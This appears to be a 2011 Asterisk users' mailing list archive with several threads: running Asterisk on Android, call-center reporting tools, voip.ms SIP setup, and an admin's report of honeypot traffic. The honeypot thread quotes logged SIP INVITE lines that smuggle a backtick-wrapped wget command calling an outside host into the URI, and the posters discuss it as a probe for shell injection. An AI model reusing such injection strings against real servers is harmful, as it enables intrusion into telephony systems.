Re: [asterisk-users] Asterisk on Android?
My old phone could run Asterisk (as a PBX server). Battery died pretty quickly though... On Fri, Sep 9, 2011 at 9:03 PM, amit anand onewaytoconn...@gmail.com wrote: Hey can you share something on this On Thu, Sep 8, 2011 at 23:49, Cobra 2 cob...@linuxbasement.com wrote: I've chrooted debian onto a Motorola Droid running Cyanogenmod 7 and I've gotten asterisk to run on that just fine. On Sat, Sep 3, 2011 at 9:45 AM, Daniel Tryba dan...@tryba.nl wrote: On Sat, Sep 03, 2011 at 01:53:54PM +0200, Gilles wrote: Do you want to run the entire PBX on the Android client or are you just looking for a IAX programm to be installed for receiving calls?! The entire PBX so I can have an IVR in the phone. I don't think you can access the radio of the phone (RIL) at this moment. So if you want to use the GSM itself you are out of luck. -- Daniel Tryba -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users -- Amit Anand +91 9818559898 -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
[asterisk-users] new sort of shell attack attempt via SIP?
I haven't seen this sort of URI/shell attack prior to today but it looks interesting. Embedding a backtick in the URI with a wget that doesn't seem to do much to an empty file. I'm guessing it is just a probe to see if they can send further embedded backtick shell commands to my Asterisk instance (by watching their weblogs @ 91.223.89.94) (This happens to be my honeypot that just accepts all calls and dumps them into one big Asterisk 10 beta ConfBridge :-) INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. Does Asterisk have shell injection weakness? Or perhaps this targets some other Asterisk config manager that is subject to injection via URI? Tom -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
Re: [asterisk-users] Reporting for Asterisk Call Center
if you provide what kind of reporting you need it would be easier to point a few pointers? either you can build it yourself.. or try the Call Center module from Elastix.. can be a good tool Tarek Sawah Information Technology Adviser Integrated Digital Systems CCNP, MCSE, RHCE, TELECOM USA: +1 386 492 9993 Date: Sat, 10 Sep 2011 10:28:00 +0300 From: tzafrir.co...@xorcom.com To: asterisk-users@lists.digium.com Subject: Re: [asterisk-users] Reporting for Asterisk Call Center On Fri, Sep 09, 2011 at 01:28:28PM -0500, Gerardo Barajas wrote: There are a lot of reporting tools. I have used: Asternic: http://www.asternic.biz/ QueueMetrics: http://queuemetrics.com/index.jsp Non of those are Free (Open Source). -- Tzafrir Cohen icq#16849755 jabber:tzafrir.co...@xorcom.com +972-50-7952406 mailto:tzafrir.co...@xorcom.com http://www.xorcom.com iax:gu...@local.xorcom.com/tzafrir -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
Re: [asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:05 PM, Tom Browning wrote: INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed script tags and a with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack. -- Alex Balashov - Principal Evariste Systems LLC 260 Peachtree Street NW Suite 2200 Atlanta, GA 30303 Tel: +1-678-954-0670 Fax: +1-404-961-1892 Web: http://www.evaristesys.com/ -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
Re: [asterisk-users] new sort of shell attack attempt via SIP?
I disagree with the 'review CDR' angle for a number of reasons: a) there is a backtick in the URI trying to force shell and the proper wget command line to send results to /dev/null b) the V.php (at the url) appears to do nothing at all and might just be empty (for log scraping), url safety checks confirm c) the invites were sprayed across my entire IP address range To me, this is more like a scan for any SIP host that has shell injection vulerability. The list of vulnerable hosts is just a log scrape away at the server 91.223.89.94 On Sun, Sep 11, 2011 at 7:20 PM, Alex Balashov abalas...@evaristesys.com wrote: On 09/11/2011 07:05 PM, Tom Browning wrote: INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed script tags and a with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack. -- Alex Balashov - Principal Evariste Systems LLC 260 Peachtree Street NW Suite 2200 Atlanta, GA 30303 Tel: +1-678-954-0670 Fax: +1-404-961-1892 Web: http://www.evaristesys.com/ -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
Re: [asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:35 PM, Tom Browning wrote: I disagree with the 'review CDR' angle for a number of reasons: a) there is a backtick in the URI trying to force shell and the proper wget command line to send results to /dev/null b) the V.php (at the url) appears to do nothing at all and might just be empty (for log scraping), url safety checks confirm c) the invites were sprayed across my entire IP address range To me, this is more like a scan for any SIP host that has shell injection vulerability. The list of vulnerable hosts is just a log scrape away at the server 91.223.89.94 On second thought, your interpretation does make much more sense. :-) -- Alex Balashov - Principal Evariste Systems LLC 260 Peachtree Street NW Suite 2200 Atlanta, GA 30303 Tel: +1-678-954-0670 Fax: +1-404-961-1892 Web: http://www.evaristesys.com/ -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
Re: [asterisk-users] Question about voip.ms service.
Hi, I am trying to set up my asterisk 1.8.5 with voip.ms. I had no problem with the incoming, but my outgoing is not working. If at all possible, I would like to stick with SIP. Since the original poster (Glen) had mentioned that he had gotten outgoing working, I was wondering if you would be kind enough to post some thoughts on that. Were you able to get it working with just the default example sip.conf / extensions.conf settings that they have on their website? I have pretty much the same settings. When I dial out, the destination rings, but I can't hear a ringback tone from on the source side ( I am using a PAP2T router with a phone). I have set up outgoing with actionvoip before and that is working fine, so I am thinking my router settings for my ports are correct - but I am no expert. I would really appreciate it if you could post the relevant section of your sip.conf for me. Thanks! Naren On Thu, Jun 9, 2011 at 3:22 PM, Steve Edwards asterisk@sedwards.comwrote: On Thu, 9 Jun 2011, John Novack wrote: I use voip.ms and have no issues using IAX and Asterisk 1.4.xx 'slam-dunk.' Though they suggest SIP, I chose IAX and have 4569 UDP open in my firewall a Their on line config samples just work! is Suggest you check your firewall and your configs, and above all post some more information IAX If you really want to upset some, top post as I have just done! Agreed. The real issue is communication, top bottom or in the middle Sometimes, it's just about being considerate to 'the next guy.' -- Thanks in advance, --**--** - Steve Edwards sedwa...@sedwards.com Voice: +1-760-468-3867 PST Newline Fax: +1-760-731-3000 -- __**__**_ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/**mailman/listinfo/asterisk-**usershttp://lists.digium.com/mailman/listinfo/asterisk-users -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users